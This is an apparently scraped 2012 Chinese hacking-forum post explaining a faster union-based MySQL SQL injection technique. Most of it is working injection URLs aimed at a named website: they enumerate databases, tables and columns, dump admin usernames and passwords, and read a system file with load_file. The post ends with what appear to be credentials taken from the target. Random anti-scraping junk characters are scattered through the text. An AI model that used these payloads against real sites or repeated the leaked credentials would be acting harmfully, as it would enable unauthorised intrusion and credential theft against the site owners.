中国网络渗透测试联盟

标题: mysql注入高效方法 [打印本页]

作者: admin    时间: 2012-9-13 16:37
标题: mysql注入高效方法
此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似
: {  ?( @: s6 N! [但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人
8 X/ e% @2 I4 N- o8 Y$ F( K' `$ z& N5 E1 t8 f/ n: P8 Q6 {
& G. J  A: R/ o3 {% x
优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入
5 s7 w; Q9 N% _1 u
. q$ z2 k3 d) F4 V  }缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...
6 i7 u0 K. x9 K6 J& Q+ j
: e' G9 f* `  h$ ~% |6 U) O9 U8 w下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示- {! f, ?- d7 V' w: v
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ ,  + 等等
8 {( R" a, I' ]1 B
" a: R3 {/ Z& shttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17+ \' P: e6 B! e  D! h$ O% k
9 K; W0 k6 H" |  C0 B
读出所有库:
& Z! U* }  Z0 g4 N% {0 khttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA
/ F/ b# L1 M. ~5 o; ?: P( @
- O3 D7 R% R0 W% B2 T: N0 |
  n) x( j0 I/ A9 r* a6 \* f$ x! X/ ~  ]6 w
读出所有表:- b- g& J$ l! R
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
5 [2 {9 R, {! \: ~! F
- O- U( S1 ]* W, |* b! R读出所有表字段:& j1 U$ j) G2 J* q, T6 `9 }4 b
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)$ f# c7 ]  v0 s# ?0 C
*/ (97,100,109,105,110)为admin的ascii码 依次类推, N1 {( J1 z% j: q0 _1 S

8 U1 K+ X( K* w( @读出所有表字段里的内容:2 Q8 A/ K! @! d: D- @) r
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin# y2 z9 W. L+ B) z: ]9 D
/ x( k0 M3 H& k

1 b# l. J2 ?  E, A1 Q
6 X$ l0 t) O$ H3 S7 T5 C6 Y- K, `0 y$ Y! A0 I2 H+ N

2 C( ]% m/ D/ t
9 P! P' R8 T# {7 yhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
$ o" u% ?1 \. O5 o
, ~! P, C, J- ^, `7 q5 M" i# b6 y
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
# t8 ?  c; ^1 V" @0 R  w
" M( }, u; L5 ^! A4 whttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%234 y# n. s* v% Z+ v; N$ l. R
7 B  b2 G  j5 i& C$ ?  |6 q

7 x1 j( d! U9 b8 nhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
& h2 U2 W% T6 z: W1 O0 b$ U2 h% w% {$ [% s# J8 n9 {3 f
! `8 r$ N" F2 L# {1 v- V  u
        webmaster:dzb521123,simlab:simadmin20043233; @5 j! ?2 k; C' N: W$ Q) q





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2